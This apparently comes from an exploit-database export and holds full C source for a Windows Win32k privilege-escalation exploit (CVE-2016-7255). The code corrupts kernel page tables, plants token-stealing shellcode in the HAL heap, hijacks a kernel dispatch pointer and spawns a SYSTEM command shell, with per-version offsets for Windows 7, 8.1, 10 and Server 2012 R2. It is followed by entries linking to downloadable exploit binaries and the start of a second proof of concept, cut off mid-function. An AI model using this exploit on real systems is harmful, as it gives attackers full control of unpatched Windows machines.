0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\n\n\t0x5b, // POP RBX\n\t0x59, // POP RCX\n\t0x58, // POP RAX\n\t0x9d, // POPFQ\n\n\t0xfb, // STI\n\t0xff, 0xe0 // JMP RAX\n};\n\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList = NULL;\n\tULONG ulRet = 0;\n\n\tdo\n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\n\n\t\tva_start(VaList, Format);\n\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\n\n\n\t\tOutputDebugStringA(pszDbgBuff);\n\n\t\tva_end(VaList);\n\n\t} while (FALSE);\n\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\n\t\tpszDbgBuff = NULL;\n\t}\n\n\treturn ulRet;\n}\n\n\nint _sim_key_down(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = 0;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_key_up(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_alt_shift_esc()\n{\n\tint i = 0;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\n\n\nint _sim_alt_shift_tab(int nCount)\n{\n\tint i = 0;\n\tHWND hWnd = NULL;\n\n\n\tint nFinalRet = -1;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\tfor (i = 0; i < nCount; i++)\n\t\t{\n\t\t\t_sim_key_down(VK_TAB);\n\t\t\t_sim_key_up(VK_TAB);\n\n\t\t\tSleep(1000);\n\n\t\t}\n\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\t} while (FALSE);\n\n\treturn nFinalRet;\n}\n\nint _sim_alt_esc(int count)\n{\n\tint i = 0;\n\n\tfor (i = 0; i<count; i++)\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t//_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t//_sim_key_up(VK_SHIFT);\n\n\t}\n\n\treturn 0;\n}\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = { 0 };\n\n\tHWND hWndParent = NULL;\n\tHWND hWndChild = NULL;\n\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\n\n\tvoid* pId = NULL;\n\tMSG stMsg = { 0 };\n\n\tUINT64 value = 0;\n\n\tdo\n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\n\t\tif (0 == RegisterClassExW(&stWC))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n#ifdef _WIN64\n\t\tpId = ((UCHAR*)pAddress - 0x28);\n#else\n\t\tpId = ((UCHAR*)pAddress - 0x14);\n#endif // #ifdef _WIN64\n\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\n\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild, GetDesktopWindow());\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\n\t\tSwitchToThisWindow(hWndChild, TRUE);\n\n\t\t_sim_alt_shift_esc();\n\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\n\t\t\t\n\t\t\tSetFocus(hWndParent);\n\t\t\t_sim_alt_esc(20);\n\t\t\tSetFocus(hWndChild);\n\t\t\t_sim_alt_esc(20);\n\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t\t\n\t\t\tif (value != 0) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t\n\n\t\t\t__try {\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\n\t\t\t\tif ((value & 0x67) == 0x67) {\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t}\n\n\n\t} while (FALSE);\n\n\tif (NULL != hWndParent)\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif (NULL != hWndChild)\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\n\n\treturn 0;\n}\n\nUINT64 get_pxe_address(UINT64 address) {\n\tUINT entry = PML4_SELF_REF_INDEX;\n\tUINT64 result = address >> 9;\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\n\tresult = result | lower_boundary;\n\tresult = result & upper_boundary;\n\treturn result;\n}\n\nUINT64 look_free_entry_pml4(void) {\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\n\tint offset = 0xF00;\n\tUINT64 pml4_search = PML4_BASE + offset;\n\twhile (offset < 0xFF8)\n\t{\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\n\t\t{\n\t\t\t// This is a NULL (free) entry\n\t\t\tbreak;\n\t\t}\n\t\toffset += 8;\n\t\tpml4_search = PML4_BASE + offset;\n\t}\n\treturn pml4_search;\n}\n\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\n\tUINT64 result = (\n\t\t((UINT64)0xFFFF << 48) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\n\t\t(index << 12)\n\t\t);\n\treturn result;\n}\n\n\n\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\n\n\t/*\n\t1: kd> !pte ffffffff`ffd00000\n\tVA ffffffffffd00000\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\n\t*/\t\n\n\tUINT64 pte = get_pxe_address(virtual_address);\n\tint pte_offset = pte & 0xFFF;\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\n\t\n\tUINT64 pde = get_pxe_address(pte);\n\tint pde_offset = pde & 0xFFF;\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\n\t\t\n\tUINT64 pdpte = get_pxe_address(pde);\n\tint pdpte_offset = pdpte & 0xFFF;\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\n\t\t\n\tUINT64 pml4e = get_pxe_address(pdpte);\n\tint pml4e_offset = pml4e & 0xFFF;\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\n\t\n\tUINT64 spurious_offset = look_free_entry_pml4();\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\n\tUINT64 f_e_pml4 = spurious_offset;\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\n\tprintf(\"--------------------------------------------------\\n\\n\");\n\t\n\t\n\t//Read the physical address of pml4e\t\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\n\t// Change the PxE\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\n\t\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pdpte\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\n\t// Change the PxE\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pde\n\tUINT64 pde_addr = spurious_pt + pde_offset;\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\n\t// Change the PxE\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pte\n\tUINT64 pte_addr = spurious_pt + pte_offset;\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\n\t// Change the PxE\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \n\tif (patch_original) {\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\n\t}\n \n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\tprintf(\"\\n\\n\");\n\treturn spurious_pt;\n}\n\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteAddress += (target_address & 0xFFF);\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\n}\n\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteTarget += (target_address & 0xFFF);\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\n\t*(PVOID *)target = (PVOID)hook_address;\n}\n\n\nUINT64 store_shellcode_in_hal(void) {\n\t//// Finally store the shellcode on the HAL\n\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\n\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \n\t// 0xfff - 0xd50 = 0x2af space\n\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\n\treturn 0xffffffffffd00d50;\n}\n\nUINT64 GetHalDispatchTable() {\n PCHAR KernelImage;\n SIZE_T ReturnLength;\n HMODULE hNtDll = NULL;\n UINT64 HalDispatchTable;\n HMODULE hKernelInUserMode = NULL;\n PVOID KernelBaseAddressInKernelMode;\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\n\n hNtDll = LoadLibrary(\"ntdll.dll\");\n\n if (!hNtDll) {\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\n\n if (!NtQuerySystemInformation) {\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\n\n // Allocate the Heap chunk\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n ReturnLength);\n\n if (!pSystemModuleInformation) {\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\n pSystemModuleInformation,\n ReturnLength,\n &ReturnLength);\n\n if (NtStatus != STATUS_SUCCESS) {\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\n\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\n \n hKernelInUserMode = LoadLibraryA(KernelImage);\n\n if (!hKernelInUserMode) {\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n // This is still in user mode\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\n\n if (!HalDispatchTable) {\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n else {\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\n\n // Here we get the address of HapDispatchTable in Kernel mode\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\n }\n\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\n\n if (hNtDll) {\n FreeLibrary(hNtDll);\n }\n\n if (hKernelInUserMode) {\n FreeLibrary(hKernelInUserMode);\n }\n\n hNtDll = NULL;\n hKernelInUserMode = NULL;\n pSystemModuleInformation = NULL;\n\n return HalDispatchTable;\n}\n\nint __cdecl main(int argc, char** argv)\n{\n\tTCHAR pre_username[256];\n\tTCHAR post_username[256];\n\tDWORD size = 256;\n\tULONG Interval = 0;\n\tHMODULE hNtDll = NULL;\n\tUINT retval;\n UINT64 overwrite_address;\n int overwrite_offset;\n \n // define operating system version specific variables\n unsigned char sc_KPROCESS;\n unsigned int sc_TOKEN;\n unsigned int sc_APLINKS;\n\tint osversion;\n\n\tif (argc != 2) {\n\t\tprintf(\"Please enter an OS version\\n\");\n\t\tprintf(\"The following OS'es are supported:\\n\");\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\n\t\tprintf(\"\\n\");\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\n\t\treturn -1;\n\t}\n\t\n\tosversion = _strtoui64(argv[1], NULL, 10);\n\t\n if(osversion == 7) \n {\n // the target machine's OS is Windows 7 SP1\n printf(\" [+] Windows 7 SP1\\n\");\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \n }\n\telse if(osversion == 81)\n {\n // the target machine's OS is Windows 8.1\n printf(\" [+] Windows 8.1\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 10)\n {\n // the target machine's OS is Windows 10 prior to build 14393\n printf(\" [+] Windows 10\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 12)\n {\n // the target machine's OS is Windows 2012 R2\n printf(\" [+] Windows 2012 R2\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n // in case the OS version is not any of the previously checked versions\n else\n {\n printf(\" [-] Unsupported version\\n\");\n printf(\" [*] Affected 64-bit operating systems\\n\");\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\n return -1;\n }\n \n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\n GetUserName(pre_username, &size);\n\tprintf(\"Current Username: %s\\n\", pre_username);\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\n\tprintf(\"Enter to continue...\\n\");\n\tgetchar();\n\n\tdo\n\t{\n\t\tor_address_value_4((void*)PML4_SELF_REF);\n\t} while (FALSE);\n\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\n\t\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\n\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\n\tDWORD pid = GetCurrentProcessId();\n \n /* Shellcode Patching !! */\n\tchar *p = shellcode;\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\n\n\tp += 12; // Patch shellcode with original value in the Overwrite address\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\n\n\tp += 12; // To patch the PID of our process\n\t\n\t*(DWORD *)p = (DWORD)pid;\n \n p += 17;\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\n \n p += 7;\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n UINT64 shellcode_va = store_shellcode_in_hal();\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\n\t\n\tif (osversion == 7){\n\t\t// Exploit Win7.1\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\n\n\t\tif (!hNtDll) {\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\n\n\t\tif (!NtQueryIntervalProfile) {\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\t\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\n\t}\n\n\t\n\twhile (1) {\n\t\tsize = 256;\n\t\tGetUserName(post_username, &size);\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\n\t}\n\tSleep(2000);\n\tsystem(\"cmd.exe\");\n\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - Win32k Local Privilege Escalation", "edition": 1, "published": "2019-05-15T00:00:00", "title": "Microsoft Windows - Win32k Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0803", "CVE-2016-7255"], "modified": "2019-05-15T00:00:00", "id": "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "href": "", "sourceData": "# CVE-2019-0803\nWin32k Elevation of Privilege Poc\n\nReference\n-----------------------------\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\n\n\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k Denial of Service (MS16-135)", "edition": 1, "published": "2016-11-09T00:00:00", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "href": "", "sourceData": "/*\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\nFull Proof of Concept:\n\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\n\n********************************************************************\n Created:\t2016-11-09 14:23:09\n Filename: \tmain.c\n Author:\troot[at]TinySec.net\n Version\t0.0.0.1\n Purpose:\tpoc of cve-2016-0075\n*********************************************************************\n*/\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n\n//////////////////////////////////////////////////////////////////////////\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n\n#undef DbgPrint\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList=NULL;\n\tULONG ulRet = 0;\n\t\n\tdo \n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\n\t\t\n\t\tva_start(VaList,Format);\n\t\t\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\n\t\t\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\n\t\tOutputDebugStringA(pszDbgBuff);\n\t\t\n\t\tva_end(VaList);\n\t\t\n\t} while (FALSE);\n\t\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\n\t\tpszDbgBuff = NULL;\n\t}\n\t\n\treturn ulRet;\n}\n\n\n int _sim_key_down(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = 0;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_key_up(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_alt_shift_esc()\n {\n\t int i = 0;\n\t \n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\t\t \n\t\t\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\t\t\t \n\t\t _sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \t \n\t\t \n\t\t \n\t } while 